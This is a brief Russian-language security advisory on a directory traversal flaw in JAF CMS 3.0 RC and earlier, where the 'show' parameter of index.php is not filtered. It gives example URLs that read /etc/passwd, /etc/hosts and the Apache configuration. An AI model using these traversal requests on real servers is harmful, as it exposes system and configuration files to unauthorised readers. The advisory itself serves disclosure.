Программа: JAF CMS 3.0 RC и более ранние версии 

Удаленный атакующий может просмотреть
произвольные файлы на уязвимой системе.
Уязвимость обнаружена в 'config.php' из-за
некорректной фильтрации входных данных
параметра ‘show’. Удаленный атакующий может
использовать символы перехода между
каталогами для просмотра различных файлов
с правами web сервера.

Пример:

http://localhost/jaf/index.php?show= ../../../../../../../etc/passwd
http://localhost/jaf/index.php?show= ../../../../../../../etc/hosts
http://localhost/jaf/index.php?show= ../../../../../../../etc/httpd/conf/httpd.conf

Оставить мнение